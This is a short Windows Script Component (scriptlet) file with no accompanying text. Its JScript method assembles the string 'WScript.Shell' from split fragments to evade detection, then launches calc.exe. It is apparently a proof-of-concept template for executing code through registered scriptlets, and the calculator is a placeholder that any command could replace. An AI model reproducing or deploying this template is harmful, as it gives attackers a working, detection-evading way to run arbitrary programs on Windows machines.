<?XML version="1.0"?>
<scriptlet>
<registration description="Desc" progid="progid" version="0" classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"></registration>


<public>
    <method name="Exec"></method>
</public>

<script language="JScript">
<![CDATA[
	function Exec()	{
        adad = "Ws"
        godi="cri"
        dogi="pt"
        pew=".Sh"
        peroi="ell"
		var r = new ActiveXObject(adad + godi + dogi + pew + peroi).Run("calc.exe");
	}
]]>
</script>
</scriptlet>